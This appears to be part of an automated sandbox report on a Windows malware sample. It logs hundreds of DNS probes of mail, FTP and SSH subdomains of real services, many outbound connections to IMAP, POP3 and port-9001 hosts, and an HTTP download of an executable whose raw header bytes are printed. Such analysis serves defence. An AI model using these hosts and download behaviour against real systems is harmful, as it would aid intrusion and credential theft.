                Source: unknownDNS traffic detected: query: ftp.servicios.sat.gob.mx replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: mail.signup.takendelight.com replaycode: Server failure (2)
                Source: unknownDNS traffic detected: query: pop.signup.takendelight.com replaycode: Server failure (2)
                Source: unknownDNS traffic detected: query: mailgate.signup2.br.leagueoflegends.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: mailgate.netizion.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: pop.ventas.officeinsumos.com.ar replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: ftp.oferta.senasofiaplus.edu.co replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: mail.sii.ittlahuac.edu.mx replaycode: Server failure (2)
                Source: unknownDNS traffic detected: query: pop3.mobile.liga365gacor.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: pop.midetuvelocidad.claro.com.pe replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: imap.servicios.sat.gob.mx replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: mailgate.etd.lib.tuke.sk replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: mailgate.auth.cambridgelms.org replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: brasilliker.net replaycode: Server failure (2)
                Source: unknownDNS traffic detected: query: mail.brasilliker.net replaycode: Server failure (2)
                Source: unknownDNS traffic detected: query: ssh.auth.cambridgelms.org replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: mailgate.store.steampowered.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: mail.sport.autoplay.cloud replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: ftp.ssl-es.hoteles.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: ftp.zuhauseplus.vodafone.de replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: mail.midetuvelocidad.claro.com.pe replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: pop.account.live.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: mailgate.netcsomagom.dpd.hu replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: auth.cambridgelms.org replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: relay.signin.rockstargames.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: imap.tls21.net replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: mail.ssl-es.hoteles.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: pop3.pan.baidu.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: mailgate.m.sellercenter.lazada.com.my replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: mailgate.mobile.liga365gacor.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: mail.etd.lib.tuke.sk replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: mail.s163-es.ogame.gameforge.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: relay.tls21.net replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: smtp.etd.lib.tuke.sk replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: ssh.etd.lib.tuke.sk replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: ftp.sii.ittlahuac.edu.mx replaycode: Server failure (2)
                Source: unknownDNS traffic detected: query: ssh.ssl-es.hoteles.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: relay.signup.takendelight.com replaycode: Server failure (2)
                Source: unknownDNS traffic detected: query: mail.transaccional.saludtotal.com.co replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: relay.app.jobpet.com.br replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: pop3.netizion.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: smtp.us04web.zoom.us replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: imap.us04web.zoom.us replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: mailgate.contribuyente.seniat.gob.ve replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: smtp.analvids.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: pop.us04web.zoom.us replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: relay.casinocontroller.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: vidcorn.tv replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: imap.ssl-es.hoteles.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: smtp.sport.autoplay.cloud replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: pop3.account.live.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: mailgate.uh.is replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: relay.store.steampowered.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: relay.netcsomagom.dpd.hu replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: mailgate.midetuvelocidad.claro.com.pe replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: ssh.zuhauseplus.vodafone.de replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: ssh.contribuyente.seniat.gob.ve replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: pop.mobile.liga365gacor.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: app.jobpet.com.br replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: relay.uh.is replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: smtp.netcsomagom.dpd.hu replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: ftp.app.jobpet.com.br replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: smtp.app.jobpet.com.br replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: imap.student.emis.gov.eg replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: imap.signup.takendelight.com replaycode: Server failure (2)
                Source: unknownDNS traffic detected: query: ftp.mw.redsa.net replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: pop3.servicios.sat.gob.mx replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: pop3.tls21.net replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: mailgate.sport.autoplay.cloud replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: ssh.steamcommunity.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: pop.netcsomagom.dpd.hu replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: imap.s163-es.ogame.gameforge.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: smtp.auth.cambridgelms.org replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: pop.store.steampowered.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: smtp.s163-es.ogame.gameforge.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: ftp.etd.lib.tuke.sk replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: imap.etd.lib.tuke.sk replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: ftp.mobile.liga365gacor.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: smtp.v.xsanime.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: ssh.brasilliker.net replaycode: Server failure (2)
                Source: unknownDNS traffic detected: query: ssh.us04web.zoom.us replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: ssh.netcsomagom.dpd.hu replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: sii.ittlahuac.edu.mx replaycode: Server failure (2)
                Source: unknownDNS traffic detected: query: mailgate.ssl-es.hoteles.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: relay.naukrigulf.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: ftp.sii.itzacatepec.edu.mx replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: mailgate.signup.takendelight.com replaycode: Server failure (2)
                Source: unknownDNS traffic detected: query: relay.ro.bongacams.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: pop.servicossociais.caixa.gov.br replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: ftp.gitam.zoom.us replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: pop.servicios.sat.gob.mx replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: imap.transaccional.saludtotal.com.co replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: imap.m.sellercenter.lazada.com.my replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: relay.v.xsanime.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: tls21.net replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: mail.student.emis.gov.eg replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: mail.servicossociais.caixa.gov.br replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: relay.etd.lib.tuke.sk replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: relay.student.emis.gov.eg replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: pop3.uh.is replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: mailgate.student.emis.gov.eg replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: pop3.mitextoescolar.mineduc.cl replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: imap.mobile.liga365gacor.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: smtp.ssl-es.hoteles.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: mailgate.app.jobpet.com.br replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: ftp.tls21.net replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: pop.mitextoescolar.mineduc.cl replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: etd.lib.tuke.sk replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: mail.mobile.liga365gacor.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: mail.app.jobpet.com.br replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: mailgate.ro.bongacams.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: relay.ventas.officeinsumos.com.ar replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: smtp.brasilliker.net replaycode: Server failure (2)
                Source: unknownDNS traffic detected: query: mailgate.s163-es.ogame.gameforge.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: ssh.servicios.sat.gob.mx replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: pop.app.jobpet.com.br replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: relay.sii.itzacatepec.edu.mx replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: pop.etd.lib.tuke.sk replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: ftp.milogin.michigan.gov replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: mail.account.live.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: mailgate.v.xsanime.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: pop3.sport.autoplay.cloud replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: mailgate.us04web.zoom.us replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: ftp.us04web.zoom.us replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: relay.vidcorn.tv replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: imap.signup2.br.leagueoflegends.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: pop3.sii.itzacatepec.edu.mx replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: smtp.signup.takendelight.com replaycode: Server failure (2)
                Source: unknownDNS traffic detected: query: mail.signup2.br.leagueoflegends.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: signup.takendelight.com replaycode: Server failure (2)
                Source: unknownDNS traffic detected: query: imap.loopex.io replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: mail.sii.itzacatepec.edu.mx replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: mail.us04web.zoom.us replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: mailgate.tls21.net replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: relay.transaccional.saludtotal.com.co replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: pop3.ssl-es.hoteles.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: smtp.contribuyente.seniat.gob.ve replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: pop3.casinocontroller.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: ftp.signup2.br.leagueoflegends.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: mailgate.account.live.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: ftp.netcsomagom.dpd.hu replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: pop3.store.steampowered.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: mailgate.vidcorn.tv replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: ssh.app.jobpet.com.br replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: pop3.etd.lib.tuke.sk replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: relay.contribuyente.seniat.gob.ve replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: pop.sii.itzacatepec.edu.mx replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: mailgate.ventas.officeinsumos.com.ar replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: ssh.sii.itzacatepec.edu.mx replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: relay.brasilliker.net replaycode: Server failure (2)
                Source: unknownDNS traffic detected: query: ssh.sii.ittlahuac.edu.mx replaycode: Server failure (2)
                Source: unknownDNS traffic detected: query: mailgate.transaccional.saludtotal.com.co replaycode: Name error (3)
                Uses known network protocols on non-standard ports
                Source: unknownNetwork traffic detected: HTTP traffic on port 2222 -> 63177
                Source: C:\Users\user\AppData\Local\Temp\572.exeDNS query: name: adf.ly
                Source: C:\Users\user\AppData\Local\Temp\572.exeDNS query: name: adf.ly
                Source: unknownNetwork traffic detected: DNS query count 404
                Source: unknownNetwork traffic detected: IP country count 17
                Source: global trafficTCP traffic: 192.168.2.6:49714 -> 62.210.105.46:9001
                Source: global trafficTCP traffic: 192.168.2.6:49719 -> 51.195.124.251:9001
                Source: global trafficTCP traffic: 192.168.2.6:49720 -> 88.99.248.158:9001
                Source: global trafficTCP traffic: 192.168.2.6:49744 -> 142.132.202.219:2023
                Source: global trafficTCP traffic: 192.168.2.6:49773 -> 178.32.136.221:9001
                Source: global trafficTCP traffic: 192.168.2.6:52511 -> 184.25.164.103:143
                Source: global trafficTCP traffic: 192.168.2.6:52637 -> 170.114.52.4:143
                Source: global trafficTCP traffic: 192.168.2.6:52639 -> 195.85.23.95:143
                Source: global trafficTCP traffic: 192.168.2.6:54563 -> 104.17.62.50:995
                Source: global trafficTCP traffic: 192.168.2.6:54604 -> 104.18.41.153:995
                Source: global trafficTCP traffic: 192.168.2.6:54615 -> 104.21.14.245:143
                Source: global trafficTCP traffic: 192.168.2.6:54617 -> 45.43.208.39:143
                Source: global trafficTCP traffic: 192.168.2.6:54641 -> 52.101.145.0:143
                Source: global trafficTCP traffic: 192.168.2.6:54644 -> 104.18.32.109:143
                Source: global trafficTCP traffic: 192.168.2.6:54646 -> 138.197.59.199:143
                Source: global trafficTCP traffic: 192.168.2.6:54647 -> 3.163.115.86:143
                Source: global trafficTCP traffic: 192.168.2.6:54648 -> 3.134.125.175:143
                Source: global trafficTCP traffic: 192.168.2.6:54656 -> 190.202.89.204:143
                Source: global trafficTCP traffic: 192.168.2.6:54657 -> 31.13.65.1:143
                Source: global trafficTCP traffic: 192.168.2.6:54658 -> 104.255.105.79:143
                Source: global trafficTCP traffic: 192.168.2.6:54659 -> 104.26.14.180:143
                Source: global trafficTCP traffic: 192.168.2.6:54660 -> 104.21.5.25:143
                Source: global trafficTCP traffic: 192.168.2.6:54664 -> 8.45.52.148:143
                Source: global trafficTCP traffic: 192.168.2.6:54670 -> 13.248.169.48:143
                Source: global trafficTCP traffic: 192.168.2.6:54671 -> 35.186.223.180:143
                Source: global trafficTCP traffic: 192.168.2.6:54672 -> 190.152.216.14:143
                Source: global trafficTCP traffic: 192.168.2.6:54673 -> 54.71.181.160:143
                Source: global trafficTCP traffic: 192.168.2.6:54674 -> 3.141.96.53:143
                Source: global trafficTCP traffic: 192.168.2.6:54677 -> 46.33.178.67:143
                Source: global trafficTCP traffic: 192.168.2.6:54678 -> 205.139.110.221:995
                Source: global trafficTCP traffic: 192.168.2.6:54778 -> 164.100.128.15:143
                Source: global trafficTCP traffic: 192.168.2.6:54963 -> 104.21.85.95:143
                Source: global trafficTCP traffic: 192.168.2.6:54966 -> 173.194.219.26:143
                Source: global trafficTCP traffic: 192.168.2.6:54996 -> 201.134.41.61:143
                Source: global trafficTCP traffic: 192.168.2.6:55197 -> 3.161.136.69:143
                Source: global trafficTCP traffic: 192.168.2.6:55199 -> 45.60.74.50:143
                Source: global trafficTCP traffic: 192.168.2.6:55198 -> 104.22.74.220:143
                Source: global trafficTCP traffic: 192.168.2.6:55212 -> 31.13.88.1:143
                Source: global trafficTCP traffic: 192.168.2.6:55214 -> 45.60.0.44:143
                Source: global trafficTCP traffic: 192.168.2.6:55217 -> 34.149.46.130:143
                Source: global trafficTCP traffic: 192.168.2.6:55218 -> 44.233.131.115:143
                Source: global trafficTCP traffic: 192.168.2.6:55219 -> 186.28.225.16:143
                Source: global trafficTCP traffic: 192.168.2.6:55220 -> 54.158.51.60:143
                Source: global trafficTCP traffic: 192.168.2.6:55227 -> 3.161.150.89:143
                Source: global trafficTCP traffic: 192.168.2.6:55229 -> 54.183.63.241:143
                Source: global trafficTCP traffic: 192.168.2.6:55235 -> 179.191.175.66:143
                Source: global trafficTCP traffic: 192.168.2.6:55236 -> 124.237.208.37:143
                Source: global trafficTCP traffic: 192.168.2.6:55245 -> 108.177.12.14:143
                Source: global trafficTCP traffic: 192.168.2.6:55268 -> 202.81.112.32:143
                Source: global trafficTCP traffic: 192.168.2.6:55286 -> 52.200.128.162:143
                Source: global trafficTCP traffic: 192.168.2.6:55287 -> 164.90.197.105:995
                Source: global trafficTCP traffic: 192.168.2.6:55288 -> 173.192.7.98:143
                Source: global trafficTCP traffic: 192.168.2.6:55290 -> 103.224.212.34:143
                Source: global trafficTCP traffic: 192.168.2.6:55292 -> 181.4.228.155:143
                Source: global trafficTCP traffic: 192.168.2.6:55302 -> 162.241.203.30:143
                Source: global trafficTCP traffic: 192.168.2.6:55388 -> 138.66.39.205:995
                Source: global trafficTCP traffic: 192.168.2.6:55389 -> 77.88.21.249:143
                Source: global trafficTCP traffic: 192.168.2.6:55390 -> 185.120.71.170:995
                Source: global trafficTCP traffic: 192.168.2.6:55418 -> 20.231.114.24:995
                Source: global trafficTCP traffic: 192.168.2.6:55455 -> 54.85.194.183:143
                Source: global trafficTCP traffic: 192.168.2.6:55459 -> 200.108.110.164:220
                Source: global trafficTCP traffic: 192.168.2.6:55468 -> 164.100.2.66:143
                Source: global trafficTCP traffic: 192.168.2.6:55469 -> 31.13.65.7:143
                Source: global trafficTCP traffic: 192.168.2.6:55476 -> 200.61.38.87:995
                Source: global trafficTCP traffic: 192.168.2.6:55511 -> 34.160.13.42:995
                Source: global trafficTCP traffic: 192.168.2.6:55531 -> 84.235.6.197:143
                Source: global trafficTCP traffic: 192.168.2.6:55541 -> 203.205.219.57:995
                Source: global trafficTCP traffic: 192.168.2.6:55557 -> 194.135.86.146:995
                Source: global trafficTCP traffic: 192.168.2.6:55558 -> 177.74.1.30:143
                Source: global trafficTCP traffic: 192.168.2.6:55573 -> 52.101.68.0:143
                Source: global trafficTCP traffic: 192.168.2.6:55576 -> 188.212.100.154:143
                Source: global trafficTCP traffic: 192.168.2.6:55585 -> 35.172.32.95:2525
                Source: global trafficTCP traffic: 192.168.2.6:55584 -> 205.220.166.26:143
                Source: global trafficTCP traffic: 192.168.2.6:55667 -> 103.90.225.70:143
                Source: global trafficTCP traffic: 192.168.2.6:55672 -> 142.251.15.14:995
                Source: global trafficTCP traffic: 192.168.2.6:55681 -> 87.233.198.20:2525
                Source: global trafficTCP traffic: 192.168.2.6:55715 -> 54.216.244.65:143
                Source: global trafficTCP traffic: 192.168.2.6:55721 -> 20.192.98.160:143
                Source: global trafficTCP traffic: 192.168.2.6:55728 -> 190.216.203.136:220
                Source: global trafficTCP traffic: 192.168.2.6:55734 -> 163.247.44.239:143
                Source: global trafficTCP traffic: 192.168.2.6:55743 -> 185.51.191.48:220
                Source: global trafficTCP traffic: 192.168.2.6:55814 -> 186.113.7.204:143
                Source: global trafficTCP traffic: 192.168.2.6:55825 -> 77.240.114.212:143
                Source: global trafficTCP traffic: 192.168.2.6:55828 -> 79.110.82.173:995
                Source: global trafficTCP traffic: 192.168.2.6:55843 -> 179.51.70.125:995
                Source: global trafficTCP traffic: 192.168.2.6:55859 -> 204.141.43.44:995
                Source: global trafficTCP traffic: 192.168.2.6:55923 -> 122.56.56.210:143
                Source: global trafficTCP traffic: 192.168.2.6:56168 -> 47.246.167.169:143
                Source: global trafficTCP traffic: 192.168.2.6:56175 -> 185.78.166.130:995
                Source: global trafficTCP traffic: 192.168.2.6:56337 -> 41.33.126.100:143
                Source: global trafficTCP traffic: 192.168.2.6:56367 -> 23.4.32.216:222
                Source: global trafficTCP traffic: 192.168.2.6:56799 -> 170.114.52.2:990
                Source: global trafficTCP traffic: 192.168.2.6:57350 -> 18.214.153.47:143
                Source: global trafficTCP traffic: 192.168.2.6:57691 -> 147.182.180.139:995
                Source: global trafficTCP traffic: 192.168.2.6:57982 -> 104.17.63.50:995
                Source: global trafficTCP traffic: 192.168.2.6:57994 -> 104.21.32.61:143
                Source: global trafficTCP traffic: 192.168.2.6:57995 -> 190.202.2.80:143
                Source: global trafficTCP traffic: 192.168.2.6:57996 -> 104.47.74.138:143
                Source: global trafficTCP traffic: 192.168.2.6:57997 -> 205.139.110.242:995
                Source: global trafficTCP traffic: 192.168.2.6:57999 -> 104.26.15.180:143
                Source: global trafficTCP traffic: 192.168.2.6:58000 -> 8.45.52.176:143
                Source: global trafficTCP traffic: 192.168.2.6:58002 -> 3.163.115.11:143
                Source: global trafficTCP traffic: 192.168.2.6:58001 -> 3.13.191.225:143
                Source: global trafficTCP traffic: 192.168.2.6:58003 -> 76.223.54.146:143
                Source: global trafficTCP traffic: 192.168.2.6:58008 -> 3.20.137.44:143
                Source: global trafficTCP traffic: 192.168.2.6:58039 -> 104.22.75.220:143
                Source: global trafficTCP traffic: 192.168.2.6:58038 -> 3.161.136.53:143
                Source: global trafficTCP traffic: 192.168.2.6:58043 -> 52.52.207.210:143
                Source: global trafficTCP traffic: 192.168.2.6:58042 -> 179.191.175.70:143
                Source: global trafficTCP traffic: 192.168.2.6:58041 -> 36.110.192.103:143
                Source: global trafficTCP traffic: 192.168.2.6:58046 -> 34.208.174.61:143
                Source: global trafficTCP traffic: 192.168.2.6:58045 -> 3.161.150.69:143
                Source: global trafficTCP traffic: 192.168.2.6:58047 -> 52.6.30.70:143
                Source: global trafficTCP traffic: 192.168.2.6:58065 -> 164.100.2.109:995
                Source: global trafficTCP traffic: 192.168.2.6:58064 -> 52.101.73.22:143
                Source: global trafficTCP traffic: 192.168.2.6:58078 -> 104.21.39.206:220
                Source: global trafficTCP traffic: 192.168.2.6:58080 -> 3.219.54.242:143
                Source: global trafficTCP traffic: 192.168.2.6:58102 -> 200.88.115.217:995
                Source: global trafficTCP traffic: 192.168.2.6:58134 -> 164.90.197.162:995
                Source: global trafficTCP traffic: 192.168.2.6:58136 -> 207.211.30.242:143
                Source: global trafficTCP traffic: 192.168.2.6:58145 -> 8.45.52.178:143
                Source: global trafficTCP traffic: 192.168.2.6:58146 -> 52.101.145.2:143
                Source: global trafficTCP traffic: 192.168.2.6:58143 -> 3.22.30.40:143
                Source: global trafficTCP traffic: 192.168.2.6:58144 -> 3.163.115.127:143
                Source: global trafficTCP traffic: 192.168.2.6:58147 -> 200.11.221.13:143
                Source: global trafficTCP traffic: 192.168.2.6:58154 -> 3.161.150.72:143
                Source: global trafficTCP traffic: 192.168.2.6:58157 -> 3.161.136.2:143
                Source: global trafficTCP traffic: 192.168.2.6:58160 -> 44.195.133.145:143
                Source: global trafficTCP traffic: 192.168.2.6:58161 -> 89.30.68.3:143
                Source: global trafficTCP traffic: 192.168.2.6:58173 -> 52.101.73.16:143
                Source: global trafficTCP traffic: 192.168.2.6:58177 -> 164.100.2.114:995
                Source: global trafficTCP traffic: 192.168.2.6:58198 -> 44.199.96.179:143
                Source: global trafficTCP traffic: 192.168.2.6:58211 -> 207.211.30.221:143
                Source: global trafficTCP traffic: 192.168.2.6:58214 -> 52.21.29.94:995
                Source: global trafficTCP traffic: 192.168.2.6:58217 -> 164.90.197.143:995
                Source: global trafficTCP traffic: 192.168.2.6:58218 -> 3.14.182.203:143
                Source: global trafficTCP traffic: 192.168.2.6:58219 -> 3.163.115.17:143
                Source: global trafficTCP traffic: 192.168.2.6:58220 -> 8.45.52.146:143
                Source: global trafficTCP traffic: 192.168.2.6:58221 -> 52.101.144.0:143
                Source: global trafficTCP traffic: 192.168.2.6:58227 -> 44.194.231.6:143
                Source: global trafficTCP traffic: 192.168.2.6:58229 -> 3.161.150.61:143
                Source: global trafficTCP traffic: 192.168.2.6:58230 -> 3.161.136.62:143
                Source: global trafficTCP traffic: 192.168.2.6:58234 -> 179.191.175.69:143
                Source: global trafficTCP traffic: 192.168.2.6:58236 -> 52.87.107.230:143
                Source: global trafficTCP traffic: 192.168.2.6:58237 -> 164.100.2.115:995
                Source: global trafficTCP traffic: 192.168.2.6:58238 -> 52.101.73.2:143
                Source: global trafficTCP traffic: 192.168.2.6:58249 -> 207.211.30.141:143
                Source: global trafficTCP traffic: 192.168.2.6:58254 -> 3.134.39.220:143
                Source: global trafficTCP traffic: 192.168.2.6:58260 -> 147.182.189.184:995
                Source: global trafficTCP traffic: 192.168.2.6:58264 -> 54.205.118.36:143
                Source: global trafficTCP traffic: 192.168.2.6:58271 -> 164.100.2.144:995
                Source: global trafficTCP traffic: 192.168.2.6:58272 -> 52.101.73.4:143
                Source: global trafficTCP traffic: 192.168.2.6:58277 -> 164.90.197.79:995
                Source: global trafficTCP traffic: 192.168.2.6:58278 -> 205.139.110.141:143
                Source: global trafficTCP traffic: 192.168.2.6:58284 -> 164.100.2.145:143
                Source: global trafficTCP traffic: 192.168.2.6:61932 -> 103.224.182.210:990
                Source: global trafficTCP traffic: 192.168.2.6:61939 -> 64.91.249.20:990
                Source: global trafficTCP traffic: 192.168.2.6:63002 -> 178.16.128.181:222
                Source: global trafficTCP traffic: 192.168.2.6:63038 -> 52.101.68.25:143
                Source: global trafficTCP traffic: 192.168.2.6:49643 -> 52.101.68.29:143
                Source: global trafficTCP traffic: 192.168.2.6:49742 -> 64.190.63.111:995
                Source: global trafficTCP traffic: 192.168.2.6:50256 -> 31.216.144.5:990
                Source: global trafficTCP traffic: 192.168.2.6:50590 -> 195.248.251.103:990
                Source: global trafficTCP traffic: 192.168.2.6:50655 -> 104.21.60.188:222
                Source: global trafficTCP traffic: 192.168.2.6:50657 -> 96.7.224.178:990
                Source: global trafficTCP traffic: 192.168.2.6:50687 -> 104.21.34.34:222
                Source: global trafficTCP traffic: 192.168.2.6:50698 -> 47.251.24.188:222
                Source: global trafficTCP traffic: 192.168.2.6:49717 -> 62.102.148.68:53
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 05 Feb 2024 11:12:27 GMTContent-Type: application/octet-streamContent-Length: 7668707Connection: keep-aliveContent-Description: File TransferContent-Disposition: attachment; filename=may.exeContent-Transfer-Encoding: binaryExpires: 0Cache-Control: must-revalidatePragma: publicCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8DDj5Jd8oE8KTt%2BYx3Q0bfwbun6txohwpNW9FRZFd1qsdYs726gbU%2Be4bAdZPDogNA9q07RDjCx%2FrCEi4ZTdVD%2FXVXxt4CbAQKi6zftp%2BQJN%2FQyMWyzOEbFx%2B5iDAFa2uJB%2B"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 850ab7ebff8506f2-ATLalt-svc: h3=":443"; ma=86400Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8f 81 0b 01 02 19 00 94 00 00 00 46 00 00 00 00 00 00 40 9c 00 00 00 10 00 00 00 b0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 01 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 50 09 00 00 00 10 01 00 00 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 